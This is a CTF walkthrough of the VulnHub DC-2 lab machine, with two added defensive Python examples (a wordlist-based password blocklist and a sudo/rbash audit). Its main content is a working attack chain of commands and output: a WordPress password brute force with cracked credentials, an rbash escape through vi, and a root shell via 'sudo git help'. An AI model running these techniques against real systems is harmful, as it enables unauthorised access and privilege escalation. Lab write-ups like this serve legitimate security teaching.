We have just completed the first vulnhub machine of the DC series by DCAU in my last post. Let's move on to the next challenge of the same series, DC:2. Like DC:1, there are many flags, but the goal is to find the final flag in the /root directory. According to the author, the machine is designed for beginners, and knowledge of the Linux command line is a must.
Setup and Configurations
You can download the VM from the vulnhub website. Run the VM in VirtualBox (or VMware Player). I ran this VM in VirtualBox with a Host-only network configuration.
You can configure a Host-only network in VirtualBox from File > Host Network Manager as shown below:
Finding Our Target
Let's run Nmap to enumerate the network and find the IP address of our target.
root@kali:~# nmap -sn 192.168.56.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-21 00:11 IST
Nmap scan report for 192.168.56.2
Host is up (0.000067s latency).
MAC Address: 08:00:27:6B:82:6D (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.5
Host is up (0.00023s latency).
MAC Address: 08:00:27:9A:59:02 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.1
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.06 seconds
So 192.168.56.5 is our target's IP (192.168.56.2 belongs to the DHCP server and 192.168.56.1 is the IP of the host-only adapter on our local machine, as shown in Setup and Configurations).
First we need to find out what services are running on the target machine. As usual, we will use nmap for that.
root@kali:~# nmap -p- -A 192.168.56.5
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-21 00:27 IST
Nmap scan report for 192.168.56.5
Host is up (0.00038s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Did not follow redirect to http://dc-2/
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey:
|   1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
|   2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
|   256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_  256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 08:00:27:9A:59:02 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.38 ms 192.168.56.5

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.34 seconds
So it has an Apache web server and an SSH service running on a non-default port (7744 instead of the usual 22). We will look into the web server first, but before that we add an entry to the /etc/hosts file mapping 192.168.56.5 to the hostname dc-2, as advised by the author.
With that mapping in place, whenever we open a page like http://dc-2/xyz on our laptop, the resolver consults the hosts file and sends the request to http://192.168.56.5/xyz.
OK! Now let's navigate to the website. It has five pages, and one of them is of interest to us.
Flag 1 basically gives a hint that in a dictionary attack the usual wordlists may not work, so we need to be cewl. Cewl? Is it cool? Well, maybe; it reminded me of the tool cewl in Kali, which is used to build wordlists from a website's contents.
Now we need to find the target that is prone to a dictionary attack. I ran Nikto to get more info and got this:
root@kali:~# nikto -h http://dc-2 | tee nikto.txt
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.5
+ Target Hostname:    dc-2
+ Target Port:        80
+ Start Time:         2019-05-23 00:09:02 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://dc-2/>; rel=shortlink
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: WordPress login found
+ 7373 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2019-05-23 00:09:26 (GMT5.5) (24 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
So we have a WordPress login page, wp-login.php. Yes, it may be prone to a dictionary attack. Let's make a wordlist with cewl and attack the login page with wpscan.
root@kali:~# cewl -w dc.txt dc-2
CeWL 5.4.3 (Arkanoid) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
where -w gives the name of the output wordlist file.
Before we can brute-force passwords, we need to know the usernames. wpscan will do both jobs for us in a single scan. I will list only the relevant output (the complete output was quite large).
root@kali:~# wpscan --url http://dc-2 -P dc.txt -e
         WordPress Security Scanner by the WPScan Team
                        Version 3.3.1
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[+] Performing password attack on Xmlrpc against 3 user/s
[SUCCESS] - jerry / adipiscing
[SUCCESS] - tom / parturient
Trying admin / log Time: 00:00:55 <=========================================> (644 / 644) 100.00% Time: 00:00:55

[i] Valid Combinations Found:
 | Username: jerry, Password: adipiscing
 | Username: tom, Password: parturient
So three users are detected: jerry, tom and admin. The passwords of jerry and tom were cracked; admin's was not.
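As an added example (not part of the original write-up and not code from the CeWL or WPScan projects), the following Python shows the idea behind the cewl step and its defensive counterpart: harvest words from page text the way CeWL does, then treat that list as a password blocklist so that site vocabulary such as the two cracked passwords is rejected. The HTML is constructed sample content, not the real dc-2 pages.

```python
import re
from html.parser import HTMLParser

# Constructed sample page (placeholder prose of the kind the write-up's
# wordlist was harvested from; not the real dc-2 content).
SAMPLE_HTML = """
<html><head><title>DC-2</title><style>body{color:red}</style></head>
<body><h1>Welcome</h1>
<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit.</p>
<p>Orci varius natoque penatibus et magnis dis parturient montes.</p>
<script>var secret = "ignored";</script></body></html>
"""

class TextExtractor(HTMLParser):
    """Collect visible text, skipping <script> and <style> bodies."""
    SKIP = {"script", "style"}

    def __init__(self):
        super().__init__()
        self.chunks = []
        self._skip = 0

    def handle_starttag(self, tag, attrs):
        if tag in self.SKIP:
            self._skip += 1

    def handle_endtag(self, tag):
        if tag in self.SKIP and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.chunks.append(data)

def build_wordlist(html, min_length=3):
    """Unique words of at least min_length letters, in first-seen order.
    CeWL's default minimum word length (its -m option) is also 3."""
    parser = TextExtractor()
    parser.feed(html)
    words = re.findall(r"[A-Za-z]+", " ".join(parser.chunks))
    return list(dict.fromkeys(w for w in words if len(w) >= min_length))

def password_is_site_word(password, wordlist):
    """Policy check: reject a password that is simply a word from the site."""
    return password.lower() in {w.lower() for w in wordlist}
```

Feeding the real site's pages through build_wordlist and wiring password_is_site_word into a registration or password-change hook is the mitigation for exactly the attack wpscan carried out here.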
There was one more interesting entry in the Nikto output: /wp-links-opml.php, which reveals the WordPress version.
It is WordPress 4.7.10. When searching for vulnerabilities I found https://www.cvedetails.com/cve/CVE-2019-8942 (Remote Code Execution), and yes, there is a Metasploit module for it! So what are we waiting for? I used the exploit/multi/http/wp_crop_rce module and ran exploit.
msf5 exploit(multi/http/wp_crop_rce) > exploit

[*] Started reverse TCP handler on 192.168.56.1:4444
[-] Exploit aborted due to failure: not-found: The target does not appear to be using WordPress
[*] Exploit completed, but no session was created.
The target is indeed running WordPress, but we now have to find another way around.
After trying a lot of things, I finally tried logging in through SSH with Tom's credentials, and it worked.
root@kali:~# ssh -p 7744 tom@dc-2
The authenticity of host '[dc-2]:7744 ([192.168.56.5]:7744)' can't be established.
ECDSA key fingerprint is SHA256:ZbyT03GNDQgEmA5AMiTX2N685NTzZuOoyMDIA+DW1qU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[dc-2]:7744,[192.168.56.5]:7744' (ECDSA) to the list of known hosts.
tom@dc-2's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$ ls
flag3.txt  usr
I tried to open flag3.txt but found that the cat command does not exist. Surely we are stuck in a restricted shell. I checked the PATH variable and found that we can use vi.
tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found
tom@DC-2:~$ echo $PATH
/home/tom/usr/bin
tom@DC-2:~$ ls /home/tom/usr/bin
less  ls  scp  vi
tom@DC-2:~$ vi flag3.txt
flag3.txt gives us the following hint:
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
We need to change user to jerry, but su is not in our list of allowed commands. Here is where knowledge of Linux and of how to escape restricted shells helped me! I used vi to escape the restricted shell. Inside vi, set the shell:
:set shell=/bin/bash
and then launch it:
:shell
And that worked. I then exported the PATH variable so that I could execute all commands.
tom@DC-2:~$ export PATH=/bin:/usr/bin:$PATH
tom@DC-2:~$ cat flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
We can see that cat is working now. Let's su to jerry.
tom@DC-2:~$ su jerry
Password:
jerry@DC-2:/home/tom$ cd /home/jerry
jerry@DC-2:~$ ls
flag4.txt
jerry@DC-2:~$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet.

You still need to get the final flag (the only flag that really counts!!!).

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!
No hints now? But still: git outta here!! Maybe git does not require the root password. Let's check with sudo -l.
jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
Yes, let's finish this! git's help command opens the manual page in an interactive viewer (the pager), from which we can run a command.
jerry@DC-2:~$ sudo git help add
And boom!! We got a root shell.
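As an added example (not from the write-up), this Python audit looks at the two misconfigurations chained here from the defender's side: a restricted shell whose PATH directory still holds programs that can spawn a shell, and a NOPASSWD sudo rule granting such a program. The directory listing and the `sudo -l` text are constructed from the values shown above; the extra apt-get rule is made up to show a rule that should not be flagged.

```python
import re

# Programs that can hand the user a shell or an interactive pager. The names
# come from the write-up itself (vi and git were used to break out; less sat
# in the same PATH directory); extend the set for your own environment.
SHELL_CAPABLE = {"vi", "vim", "less", "git"}

# Constructed sample inputs mirroring what the write-up shows; the apt-get
# rule is added here to demonstrate a rule that is NOT flagged.
SAMPLE_RBASH_PATH = ["less", "ls", "scp", "vi"]
SAMPLE_SUDO_L = """\
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
    (root) /usr/bin/apt-get
"""

# "(runas) TAG: TAG: command ..." as printed in the rules section of sudo -l
RULE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>\S.*)$")

def escapes_in_restricted_path(listing):
    """Programs in a restricted user's PATH directory that defeat rbash."""
    return sorted(name for name in listing if name in SHELL_CAPABLE)

def risky_nopasswd_rules(sudo_l_output):
    """Parse the rules section of `sudo -l` output and return (runas, command)
    for every NOPASSWD rule whose program is shell-capable."""
    findings = []
    in_rules = False
    for raw in sudo_l_output.splitlines():
        line = raw.strip()
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line:
            continue
        m = RULE.match(line)
        if not m:
            continue
        tags = re.findall(r"\w+(?=:)", m.group("tags"))
        command = m.group("cmd").split()[0]
        if "NOPASSWD" in tags and command.rsplit("/", 1)[-1] in SHELL_CAPABLE:
            findings.append((m.group("runas"), command))
    return findings
```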
That is it, guys. If you have any doubts or want me to solve any particular CTF, mention it in the comments.